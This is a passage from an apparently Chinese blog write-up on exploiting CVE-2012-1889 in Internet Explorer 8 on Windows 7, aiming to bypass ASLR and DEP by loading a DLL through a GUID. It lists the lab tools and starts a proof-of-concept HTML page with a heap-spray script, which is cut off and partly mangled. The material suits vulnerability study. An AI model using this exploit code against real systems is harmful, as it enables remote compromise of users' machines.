CVE-2012-1889 Win7 通过GUID加载dll库绕过ASLR+DEP

 前言在xp下写利用代码不需要考虑ASLR+DEP的问题，在win7下一般是通过msvcr71.dll进行rop利用，在没有安装java的情况下则不会加载msvcr71.dll，本人也是好奇如果电脑没有java环境那这个漏洞怎么利用? 有没有别的利用办法？ 选择这个漏洞是因为这个漏洞简单暴力，相对于其他漏洞更加便于利用。实验环境操作系统：Windows 7 sp1浏览器：IE 8.0 7601.17514调试器：IDA、x64dbg、ImmunityDebugger其他工具：Metasploit漏洞验证漏洞触发poc:这是网上找到一个poc：html>head>title>CVE 2012-1889 PoCtitle>head>body>object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id='poc'>object>script>var obj = document.getElementById('poc').object;var src = unescape("%u0c0c%u0c0c");while (src.length 0x1002) src += src;src = "\\\\xxx" + src;src = src.substr(0, 0x1000 - 10);var pic = ………………………………